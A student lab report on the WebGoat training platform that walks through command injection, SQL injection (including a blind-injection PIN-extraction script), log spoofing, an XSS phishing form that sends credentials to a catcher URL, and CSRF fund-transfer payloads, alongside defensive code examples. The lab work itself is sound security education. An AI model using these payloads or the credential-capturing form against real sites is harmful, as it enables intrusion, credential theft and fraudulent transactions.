2018-2019-2 Network Attack and Defense Technology 20165324 Exp9: Web Security Essentials

Experiment content

  • Experiment content overview
    • WebGoat preparation
    • SQL injection attacks
    1. Command Injection
    2. Numeric SQL Injection
    3. Log Spoofing
    4. LAB: SQL Injection
    5. String SQL Injection
    6. Blind Numeric SQL Injection
    • XSS attacks
    1. Phishing with XSS
    2. Stored XSS Attacks
    3. Reflected XSS Attacks
    • CSRF attacks
    1. Cross Site Request Forgery (CSRF)
    2. CSRF Prompt By-Pass
  • Basic questions answered
    • The principle of SQL injection attacks, and how to defend against them
      • Principle: SQL injection is a vulnerability in the way a web application's back end builds its database queries. User input is concatenated into an SQL command without checking for special characters, so an input string can carry embedded SQL of its own. The back end executes the combined string as an ordinary command, which lets the attacker perform arbitrary operations on the database, up to corrupting or destroying it.
      • Defense: build queries with bound parameters instead of string concatenation; close or remove interactive pages and forms that do not need to submit to the back end; strictly separate the privileges of ordinary users from those of system and database administrators; do not keep backup files on the server, since an infected or vulnerable backup becomes an entry point.
    • The principle of XSS attacks, and how to defend against them
      • Principle: the attacker inserts malicious HTML tags or JavaScript into a web page. When a user visits the page, or performs a certain action on it, the script runs in the user's browser. The attacker exploits the user's trust in the original site, or the browser's trust in it, to trick the user into unsafe actions or to send the user's private information to another site.
      • Defense: web developers should escape output with a safe encoding tool, never trust any data submitted by users, check input for special characters, and limit the length of input fields.
    • The principle of CSRF attacks, and how to defend against them
      • Principle: CSRF forges a request on behalf of a logged-in user. The attacker does not steal the victim's session or cookie and does not care about the victim's account or password; they rely on the browser attaching the session cookie to every request to the site. Since mainstream sites keep the session identifier in a cookie, once the user has logged in the session is the only credential the server checks, so any request carrying that cookie is treated as the victim's. The flow is: the user logs in to site A with a user name and password; after validation A sets a cookie and returns it, and from then on the user can send requests to A normally. Before the user logs out of A, they visit site B, which returns attack code that makes the browser send a request to A; the browser attaches A's cookie, A cannot tell that the request was forged, and executes it.
      • Defense: use an anti-CSRF token: the server generates a token and embeds it in each page, the token is submitted together with the form, and the server rejects any request whose token does not match; use POST for operations that change state and allow GET requests only to browse, never to modify server-side resources; set the SameSite attribute on the session cookie so browsers do not attach it to cross-site requests; clear cookies regularly.
  • Experiment summary and experience
    • In this experiment I learned a lot of new knowledge and gained a deeper understanding of and experience with network attack and defense. Although my study of many aspects was not thorough enough, I still mastered a lot of the content, and it was very rewarding.

Content 9.1: WebGoat

  • Description: WebGoat is a platform developed by OWASP for web application vulnerability experiments, used to illustrate the security vulnerabilities that exist in web applications. It runs on any platform with a Java virtual machine and currently provides more than 30 lessons, including cross-site scripting (XSS), access control, thread safety, hidden field manipulation, parameter manipulation, weak session cookies, blind SQL injection, numeric SQL injection, string SQL injection, web services, authentication failures (Open Authentication), dangerous HTML comments and so on. WebGoat provides a series of tutorials for learning web security; some lessons also include a video walkthrough that guides the user through exploiting the vulnerability.

  • Download the webgoat-container-7.0.1-war-exec.jar file.
  • In the directory containing the file, run java -jar webgoat-container-7.0.1-war-exec.jar to start WebGoat. When the message Starting ProtocolHandler ["http-bio-8080"] appears, the server is up and listening on port 8080 (you can confirm this by checking which process occupies port 8080). Do not close this terminal for the duration of the experiment.

  • In the browser enter http://localhost:8080/WebGoat to reach the WebGoat login page and log in directly with the default user name and password. (If the page shows an error, the JDK version is probably incompatible; see https://www.jianshu.com/p/9ec7838411c8 )

Content 9.2: SQL injection attacks (Injection Flaws)

1. Command Injection

  • Principle: append malicious code to a normal parameter during submission, so that the back end executes an extra command when it processes the value.

  • Goal: execute arbitrary system commands on the target host.

  • Method of operation:

  • Right-click the page and choose Inspect Element to open the page source. Right-click any option of the drop-down list, choose Edit As HTML, and append "& netstat -an & ipconfig" to its value.

  • Click View: the network port usage and the IP configuration are displayed, so the injected commands were executed. Attack successful!
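The mechanism behind the lesson, as an added example that is not part of the original report or of WebGoat's code: the submitted value is concatenated into a shell command line, so a separator inside it starts a second command. The helper names, the echo command and the allow-list of help topics are assumptions made for this example; on POSIX sh the separator is ;, while the lesson uses the Windows cmd.exe separator &.

```python
import subprocess

# Help topics the lesson legitimately serves (constructed allow-list for this example).
HELP_TOPICS = {"BasicAuthentication", "AccessControl"}


def show_help_vulnerable(topic):
    """Concatenates the submitted value into a shell command line, which is
    what the lesson's back end does. Returns the lines the shell printed."""
    result = subprocess.run("echo Help for " + topic, shell=True,
                            capture_output=True, text=True)
    return result.stdout.splitlines()


def show_help_argv(topic):
    """Same command, but the value travels as one argv element and no shell
    parses it: a separator inside it is ordinary text."""
    result = subprocess.run(["echo", "Help for", topic],
                            capture_output=True, text=True)
    return result.stdout.splitlines()


def show_help_hardened(topic):
    """Allow-list first, argv form second: rejects anything that is not a
    known topic before any process is started."""
    if topic not in HELP_TOPICS:
        raise ValueError("unknown help topic: %r" % topic)
    return show_help_argv(topic)


if __name__ == "__main__":
    # POSIX sh separates commands with ';'; Windows cmd.exe uses '&' as in the lesson.
    payload = "BasicAuthentication; echo INJECTED"
    print(show_help_vulnerable(payload))   # ['Help for BasicAuthentication', 'INJECTED']
    print(show_help_argv(payload))         # ['Help for BasicAuthentication; echo INJECTED']
    try:
        show_help_hardened(payload)
    except ValueError as err:
        print("rejected:", err)
```

The argv form alone already stops the injection, because nothing interprets the string as shell syntax; the allow-list is what makes the handler fail closed when someone later changes the command to one that reads files.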

2. Numeric SQL Injection

  • Principle: inject characters into the station field so that they combine with the back-end query into a new SQL statement.
    For example: SELECT * FROM weather_data WHERE station = [station]

  • Goal: view the weather data of all stations through SQL injection.

  • Method of operation:
    Right-click the page, choose Inspect Element to open the page source, and append or 1=1 after the number in the value attribute of the selected city's option.

  • The weather of all cities is displayed. Attack successful!

3. Log Spoofing

  • Principle: fool the human eye reading the log file; an attacker can use this to cover their tracks in the log.
  • Goal: the grey area represents the web server's log. The aim is to make the log show a "Login Succeeded" entry for the user name "admin".
  • Method of operation:
    • Premise: the lesson accepts any user name the user enters and appends it to a log file.
    • Use a carriage return (%0d) and a line feed (%0a): enter the user name hcj%0d%0aLogin Succeeded for username: admin
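The log line the lesson writes, and the fix, as an added example that is not part of the original report or of WebGoat's code: the CR LF pair in the payload ends the real entry and starts a second one that reads as a successful admin login. The "Login failed for username:" prefix and the in-memory list standing in for the log file are assumptions of this example.

```python
import re
from urllib.parse import unquote

# The lesson's payload, URL-decoded: %0d%0a becomes a CR LF pair.
PAYLOAD = unquote("hcj%0d%0aLogin Succeeded for username: admin")


def log_failed_login_vulnerable(log, username):
    """Appends the raw user name, as the lesson's logger does."""
    log.append("Login failed for username: " + username)
    return log


def sanitize_for_log(value):
    """Replaces every ASCII control character (CR, LF, tab, NUL, ...) with
    a visible escape so one input can never span more than one log line."""
    return re.sub(r"[\x00-\x1f\x7f]",
                  lambda m: "\\x%02x" % ord(m.group()), value)


def log_failed_login_hardened(log, username):
    log.append("Login failed for username: " + sanitize_for_log(username))
    return log


def lines_as_read(log):
    """What a person (or a log parser) sees: the file split on line breaks."""
    return "\n".join(log).splitlines()


if __name__ == "__main__":
    print(lines_as_read(log_failed_login_vulnerable([], PAYLOAD)))
    print(lines_as_read(log_failed_login_hardened([], PAYLOAD)))
```

Escaping rather than deleting the control characters keeps the evidence of the attempt in the log, which is what an incident responder wants to see.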

4. LAB: SQL Injection

  • Stage 1: String SQL Injection
  • Principle: bypass authentication by injecting a string.

  • Method of operation:
    • Right-click the page, choose Inspect Element to open the page source, and change the maximum length of the password box to 20, since the field is otherwise too short to hold the payload.
    • Log in as user Smith with the password Smith' or 1=1--
    • The list of all staff is returned. Attack successful!

  • Stage 3: Numeric SQL Injection

  • Principle: inject numeric data to bypass the authorization check and view the boss's profile from an ordinary employee's account.

  • Method of operation:
    • Log in with user name Larry and password larry, then click ViewProfile to view the user's profile.
    • Right-click the page, choose Inspect Element to open the page source. The profile lookup is keyed on the employee ID, and presumably the first row the query returns is the one displayed.
    • By social-engineering reasoning the boss should have the highest salary, so change the employee ID value to 101 or 1=1 order by salary desc, which makes the boss's record the first row returned.
    • The boss's account information is displayed. Attack successful!

5. String SQL Injection

  • Principle: construct your own SQL injection string based on the following query.
SELECT * FROM user_data WHERE last_name = '?'
  • Goal: the following form lets users view their credit card numbers. Use SQL injection to display all credit card information. Try the user name "Smith".

  • Method of operation:
    • Normally only the credit card numbers belonging to the entered user name are returned.
    • Enter the user name Smith' or 1=1-- (the condition becomes last_name = 'Smith' or 1=1; since 1=1 is always true, every row of the table matches)
    • All users' credit card numbers are returned. Attack successful!
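Both injection shapes used above, the numeric form of lesson 2 and LAB stage 3 (value pasted in unquoted) and the string form of lesson 5 (value pasted between quotes), beside the parameterised queries that stop them, as an added example that is not part of the original report or of WebGoat's code. It runs against an in-memory SQLite table with constructed rows; the column names and values are assumptions of this example, not WebGoat's real schema.

```python
import sqlite3

# Constructed sample rows; the real WebGoat tables have other columns and values.
USER_DATA = [
    (101, "Larry", "Stooge", "4444111122223333", 55000),
    (102, "Moe",   "Stooge", "5555111122223333", 60000),
    (103, "Curly", "Stooge", "6666111122223333", 45000),
    (104, "John",  "Smith",  "7777111122223333", 70000),
    (105, "Eric",  "Boss",   "8888111122223333", 450000),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user_data (userid INTEGER PRIMARY KEY, first_name TEXT, "
                 "last_name TEXT, cc_number TEXT, salary INTEGER)")
    conn.executemany("INSERT INTO user_data VALUES (?, ?, ?, ?, ?)", USER_DATA)
    return conn


def cards_by_last_name_vulnerable(conn, last_name):
    """String injection (lesson 5): the value is pasted between quotes, so a
    quote ends the literal and -- comments out the closing quote."""
    sql = "SELECT userid, last_name, cc_number FROM user_data WHERE last_name = '%s'" % last_name
    return conn.execute(sql).fetchall()


def cards_by_last_name_safe(conn, last_name):
    """Parameterised: the driver sends the value separately, so quotes and
    comment markers inside it are data, not syntax."""
    sql = "SELECT userid, last_name, cc_number FROM user_data WHERE last_name = ?"
    return conn.execute(sql, (last_name,)).fetchall()


def profile_vulnerable(conn, employee_id):
    """Numeric injection (lesson 2, LAB stage 3): no quotes at all, so
    'or 1=1 order by salary desc' becomes part of the statement and the
    first row returned is whoever earns most."""
    sql = "SELECT userid, first_name, salary FROM user_data WHERE userid = %s" % employee_id
    return conn.execute(sql).fetchone()


def profile_safe(conn, employee_id):
    """Type check plus parameter binding; anything that is not a plain
    integer never reaches the database."""
    if not str(employee_id).isdigit():
        return None
    sql = "SELECT userid, first_name, salary FROM user_data WHERE userid = ?"
    return conn.execute(sql, (int(employee_id),)).fetchone()


if __name__ == "__main__":
    db = make_db()
    print(cards_by_last_name_vulnerable(db, "Smith"))                 # one row
    print(cards_by_last_name_vulnerable(db, "Smith' or 1=1--"))       # every row
    print(cards_by_last_name_safe(db, "Smith' or 1=1--"))             # no such last name
    print(profile_vulnerable(db, "101"))                              # Larry
    print(profile_vulnerable(db, "101 or 1=1 order by salary desc"))  # the boss
    print(profile_safe(db, "101 or 1=1 order by salary desc"))        # None
```

The numeric case is the one developers most often get wrong: there are no quotes to escape, so "escaping the input" does nothing and only binding the value as a parameter (or converting it to an integer first) closes the hole.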

6. Blind Numeric SQL Injection

  • Principle: some SQL injections return no explicit information, and the attacker can only judge by whether a condition is "true" or "false". The attacker must make full use of the query statement and construct subqueries.

  • Goal: the lesson accepts an account number and checks whether it is valid. Use the form's true/false answer to probe other entries in the database: find the value of the pin field in the record of the pins table whose cc_number is 1111222233334444. The pin field is of type int. Enter the value you find and submit it to pass the lesson.

  • Method of operation:
    • In this lesson the server page returns only two kinds of response, account valid or account invalid, so the PIN cannot simply be queried. But we can make use of the query the back end runs: SELECT * FROM user_data WHERE userid=accountNumber;
    • If the query returns the account's row, the page reports the account as valid, otherwise invalid. With AND we can append extra conditions: if the extra condition is also true the page still reports valid, otherwise invalid.

    • Construct a compound condition for the second half of the query, e.g. 101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') > 5000 ); if the page reports invalid, the pin is at most 5000. Repeating this as a binary search finally yields pin = 2364.
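The binary search above carried out in full, as an added example that is not part of the original report or of WebGoat's code. The oracle is the lesson's query with the account number concatenated unquoted; the tables are constructed in-memory SQLite stand-ins with the PIN from the lesson, and the extra existence probe for a card number that has no row is an addition of this example (the lesson does not need it).

```python
import sqlite3


def make_db():
    """Constructed stand-in for the lesson's user_data and pins tables."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user_data (userid INTEGER PRIMARY KEY, first_name TEXT)")
    conn.execute("INSERT INTO user_data VALUES (101, 'Larry')")
    conn.execute("CREATE TABLE pins (cc_number TEXT, pin INTEGER)")
    conn.executemany("INSERT INTO pins VALUES (?, ?)",
                     [("1111222233334444", 2364), ("9999888877776666", 8018)])
    return conn


def account_is_valid(conn, account_number):
    """The lesson's oracle: the page says 'valid' iff this query returns a row.
    account_number is concatenated unquoted, exactly as in the lesson."""
    sql = "SELECT * FROM user_data WHERE userid=%s" % account_number
    return conn.execute(sql).fetchone() is not None


def recover_pin(conn, cc_number, known_account=101, lo=-1, hi=9999):
    """Binary search driven only by the true/false answer.
    Invariant: lo < pin <= hi. Returns (pin, number_of_probes), or
    (None, probes) when no row matches cc_number: the subquery would yield
    NULL, every comparison would read as 'invalid', and the search would
    silently converge on 0."""
    subquery = "(SELECT pin FROM pins WHERE cc_number='%s')" % cc_number
    probes = 1
    if not account_is_valid(conn, "%d AND (%s IS NOT NULL)" % (known_account, subquery)):
        return None, probes
    while hi - lo > 1:
        mid = (lo + hi) // 2
        probes += 1
        if account_is_valid(conn, "%d AND (%s > %d)" % (known_account, subquery, mid)):
            lo = mid      # page said valid: pin > mid
        else:
            hi = mid      # page said invalid: pin <= mid
    return hi, probes


if __name__ == "__main__":
    db = make_db()
    print(recover_pin(db, "1111222233334444"))  # (2364, 14)
    print(recover_pin(db, "0000000000000000"))  # (None, 1)
```

Fourteen requests recover a four-digit PIN; the count grows only logarithmically with the search range, which is why a yes/no oracle is enough to extract a whole table given time. The defense is the same as for the other lessons: bind the account number as a parameter so the AND clause is never parsed as SQL.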

Content 9.3: XSS attacks

  • Cross-site scripting hijacks the user's browser through HTML injection: the attacker can arbitrarily construct the HTML content the user is currently viewing and thereby simulate the user's current actions. The attack practised here captures user names and passwords.

1. Phishing with XSS

  • Principle: a page that places user input into the HTTP response without validation is vulnerable to XSS. With XSS, a phishing form can be built or content added to an official-looking page, and it is hard for the victim to tell that the content is a threat.
  • Goal: create a form that asks for a user name and password and submits the data to http://localhost/WebGoat/catcher?PROPERTY=yes&user=catchedUserName&password=catchedPasswordNam

  • Method of operation:
    • XSS lets us add further elements to an existing page. The attack has two parts:
      • the victim fills in a form;
      • a script served back with the page reads the form and sends the collected information to the attacker.
        Write a script that reads the user name and password the victim types into the form and sends them to the WebGoat catcher that collects them.
    • Write a form with user name and password input boxes:
```html
<!-- Script part. The leading </form> closes the lesson's own form so that
     the phishing form below is a separate element the script can address. -->
</form>
<script>
    function hack(){
        // Setting an Image src makes the browser issue a GET to the catcher
        // with the typed credentials in the query string.
        XSSImage=new Image;
        XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
        alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
    }
</script>
<form name="phish">
<br>
<br>
<!-- Form part: looks like a normal login box inside the trusted page. -->
<HR>
    <H2>This feature requires account login:</H2>
<br>
    <br>Enter Username:<br>
    <input type="text" name="user">
    <br>Enter Password:<br>
    <input type="password" name = "pass">
<br>
    <input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>
```

2. Stored XSS Attacks

  • Principle: this attack is common on forums and other message platforms. When a user posts a message containing a JavaScript snippet, the script is saved in the database; because it is a message, it is fetched from the database and executed whenever any user opens the page.

  • Goal: post a malicious message so that other users who view it load unexpected pages or content.

  • Send a message to a user; when the user opens it, the JS code hidden inside the message runs and the user's cookies are stolen.

3. Reflected XSS Attacks

  • Principle: in a reflected XSS attack the attacker uses the attack script to build a URL, then publishes it on another site, sends it by e-mail or otherwise gets the victim to click it.

  • Goal: build a URL with the attack script and place it on the site; whoever loads that URL is attacked.

  • Method of operation:

    • Enter the code <script>alert("hello20165324");</script> in the field; as soon as Purchase is clicked the page echoes it back and the alert pops up.
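The fix for both the stored and the reflected case is output encoding at the point where untrusted text is written into HTML, shown here as an added example that is not part of the original report or of WebGoat's code. The receipt template, the message-board rows and the script counter are constructed for this example; the payload is the one typed into the lesson.

```python
import html
import re

# Where the lesson's Purchase page echoes the submitted field back (constructed template).
RECEIPT = '<p>Thank you for your purchase. Card number: %s</p>'
# What the lesson types in.
PAYLOAD = '<script>alert("hello20165324");</script>'


def render_receipt_vulnerable(card_field):
    """Reflected XSS: the request value goes straight into the response."""
    return RECEIPT % card_field


def render_receipt_escaped(card_field):
    """Output encoding for an HTML text node: <, >, &, " and ' become entities,
    so the browser shows the payload as text instead of running it."""
    return RECEIPT % html.escape(card_field, quote=True)


def render_board_vulnerable(messages):
    """Stored XSS: messages come back from the database and are pasted into
    the page for every viewer."""
    return "\n".join("<li>%s: %s</li>" % (author, body) for author, body in messages)


def render_board_escaped(messages):
    """Escape on output, not on input: the database keeps the original text,
    and every rendering path applies the encoding for its own context."""
    return "\n".join("<li>%s: %s</li>" % (html.escape(author, quote=True),
                                          html.escape(body, quote=True))
                     for author, body in messages)


def active_script_count(page):
    """Counts <script openings the browser would actually execute."""
    return len(re.findall(r"<script\b", page, flags=re.IGNORECASE))


if __name__ == "__main__":
    print(render_receipt_vulnerable(PAYLOAD))
    print(render_receipt_escaped(PAYLOAD))
    board = [("alice", "hello"), ("20165324", PAYLOAD)]   # constructed stored messages
    print(active_script_count(render_board_vulnerable(board)))  # 1
    print(active_script_count(render_board_escaped(board)))     # 0
```

html.escape is the right encoder for text nodes and quoted attribute values only; a value written inside a JavaScript block, an unquoted attribute or a URL needs the encoder for that context, and no encoding makes it safe to let users supply whole tags.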

Content 9.4: CSRF attacks

1. Cross Site Request Forgery (CSRF)

  • Method of operation:
    • Look at the src and menu values under Parameters on the right of the page: 276 and 900 respectively.
    • Enter anything in the Title field and enter the following in the Message field:
<img src="http://localhost:8080/WebGoat/attack?Screen=276&menu=900&transferFunds=5000" width="1" height="1" />
    • This puts the URL into the message in the form of an image, so it is invisible to other users (the width and height are set to 1 pixel to hide the image). As soon as a user's browser renders the message it requests the image, and that request triggers the CSRF transfer. Click Submit.
    • A message named after the Title appears in the Message List. Clicking it loads the message into the current page, the browser fetches the image with the user's session cookie attached, and 5000 is transferred away: the CSRF attack has succeeded.

2. CSRF Prompt By-Pass

  • Method of operation:

    • Look at the src and menu values under Parameters on the right of the page: 276 and 900 respectively.
    • Enter the student number in the Title field and the following code in the Message field:
    <iframe src="attack?Screen=276&menu=900&transferFunds=5000"> </iframe>
    <iframe src="attack?Screen=276&menu=900&transferFunds=CONFIRM"> </iframe>
    • A link named after the Title appears in the Message List. Clicking it loads both iframes: the first requests the transfer and the second answers the confirmation prompt, so the attack succeeds without the user seeing the prompt.
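The token defense from the basic-questions section applied to the transfer handler, as an added example that is not part of the original report or of WebGoat's code. The handler, the session identifiers and the form are constructed for this example; deriving the token as an HMAC of the session id is one common design and is an assumption here, not WebGoat's fix.

```python
import hashlib
import hmac
import secrets

# Per-process secret; a real server would load it from configuration (constructed).
SERVER_SECRET = secrets.token_bytes(32)


def issue_csrf_token(session_id):
    """Token bound to the session: the attacker's site cannot compute it
    without the secret, and cannot read it out of the victim's page because
    of the same-origin policy."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def transfer_form(session_id):
    """The legitimate page embeds the token in a hidden field."""
    return ('<form method="POST" action="attack?Screen=276&menu=900">'
            '<input type="hidden" name="csrf_token" value="%s">'
            '<input name="transferFunds"><input type="submit"></form>'
            % issue_csrf_token(session_id))


def handle_transfer(session_id, method, params):
    """Simulated transferFunds handler. The session cookie arrives with every
    request the browser makes, so it proves nothing about intent; the token
    does. compare_digest keeps the check constant-time."""
    if method != "POST":
        return "rejected: state-changing request must be POST"
    if not hmac.compare_digest(params.get("csrf_token", ""), issue_csrf_token(session_id)):
        return "rejected: missing or wrong CSRF token"
    return "transferred %s" % params["transferFunds"]


if __name__ == "__main__":
    victim = "session-victim"
    # 1. The lesson's <img src=...transferFunds=5000>: a GET the browser makes on its own.
    print(handle_transfer(victim, "GET", {"transferFunds": "5000"}))
    # 2. Auto-submitted form on the attacker's page: POST, but no token.
    print(handle_transfer(victim, "POST", {"transferFunds": "5000"}))
    # 3. Attacker pastes the token from their own session.
    print(handle_transfer(victim, "POST", {"transferFunds": "5000",
                                           "csrf_token": issue_csrf_token("session-attacker")}))
    # 4. The real form, rendered to the victim.
    print(handle_transfer(victim, "POST", {"transferFunds": "5000",
                                           "csrf_token": issue_csrf_token(victim)}))
```

Both lessons above fail against this handler: the image and the iframes can only produce requests whose parameters the attacker chose, and they cannot include a token they have never seen. Marking the session cookie SameSite is a second, independent layer, since the browser then omits the cookie from the cross-site request in the first place.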

Origin www.cnblogs.com/20165324hcj/p/10925491.html